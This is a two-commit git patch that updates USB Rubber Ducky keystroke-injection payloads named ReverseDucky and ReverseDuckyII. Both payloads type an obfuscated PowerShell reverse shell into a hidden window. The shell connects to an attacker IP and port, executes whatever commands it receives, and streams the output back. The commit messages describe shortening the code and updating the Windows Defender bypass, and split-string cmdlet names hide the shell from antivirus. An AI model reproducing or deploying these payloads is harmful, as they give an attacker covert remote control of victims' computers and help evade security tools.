From 2370e63c0271a5b59a55a008b6cb67784a90430f Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Thu, 30 Sep 2021 11:27:35 +0200 Subject: [PATCH 1/2] Update ReverseDucky 1.1 to Version 1.2 Shorten the code to increase the speed --- .../remote_access/ReverseDucky/ReverseDucky.txt | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt index 7492c1d..169d7e9 100644 --- a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt +++ b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt @@ -1,9 +1,9 @@ REM ReverseDucky -REM Version 1.1 +REM Version 1.2 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) REM Author: 0iphor13 -REM Reverse shell executed in the background +REM Reverse shell executed in the background - If blocked by Windows Defender, please contact me. REM Fill in Attacker IP & Port in line 18 REM DON'T FORGET TO START LISTENER @@ -15,14 +15,12 @@ DELAY 250 ENTER DELAY 200 -STRING $I='0.0.0.0';$P=4444;$0LVhbQ= [TyPE]('tExT'+'.enCOD'+'InG') ; $C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPCl +STRING $I='0.0.0.0';$P=4444;$0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient($ DELAY 200 -STRING ient($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b, 0, $b.Length)) -n +STRING I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject' DELAY 200 -STRING e 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb=(&('ie'+'x') $d 2>&1 | . +STRING ) -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'PS'+(& DELAY 200 -STRING ('Out'+'-St'+'ring') );$sb2=$sb+'PS '+(&('pw'+'d')).Path + '> ';$sbt=( $0lvHBq::ASCII).GetBytes($sb2);$S.Write($sbt,0, -DELAY 200 -STRING $sbt.Length);$S.Flush()};$C.Close() +STRING ('pw'+'d')).Path+'>';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close() DELAY 100 ENTER From 169aa7a4293203002a709e55ad923002a728c72d Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Fri, 29 Oct 2021 09:19:21 +0200 Subject: [PATCH 2/2] Updated ReverseDucky 2 to version 1.2 + Shorten the code + Changed shell design + Updated Defender bypass --- .../ReverseDuckyII/ReverseDuckyII.txt | 22 ++++++------------- 1 file changed, 7 insertions(+), 15 deletions(-) diff --git a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt index e43740b..d30661b 100644 --- a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt +++ b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt @@ -1,5 +1,5 @@ REM ReverseDucky2 -REM Version 1.0 +REM Version 1.1 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) REM Author: 0iphor13 @@ -11,24 +11,16 @@ REM DON'T FORGET TO START LISTENER DELAY 1500 GUI r DELAY 500 -STRING powershell -NoP -NonI -W hidden -Exec Bypass +STRING powershell -NoP -NonI -W hidden DELAY 250 ENTER DELAY 200 -STRING $IP='0.0.0.0';$Port=4444;$client = .('N'+'ew-O'+'bject') sYSteM.neT.soCKETs.TcPCLient -DELAY 200 -STRING ($IP,$Port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|.('%'){0};while(($i = $s -DELAY 200 -STRING tream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (.('Ne'+'w-O'+'bject') -TypeName SystE -DELAY 200 -STRING M.tEXt.aSCiIEnCodinG).GetString($bytes,0, $i);$sendback = (.('i'+'ex') $data 2>&1 | .('Ou -DELAY 200 -STRING t-'+'Str'+'in'+'g') );$sendback2 = $sendback + 'PS ' + (&('p'+'wd')).Path + '> ';$sendbyt -DELAY 200 -STRING e = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Len -DELAY 200 -STRING gth);$stream.Flush()};$client.Close() +STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("ATTACKER-IP",PORT);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$ +DELAY 100 +STRING s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oU +DELAY 100 +STRING t-STriNG);$x=$z+"RD "+(pwd)+"#";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE() DELAY 100 ENTER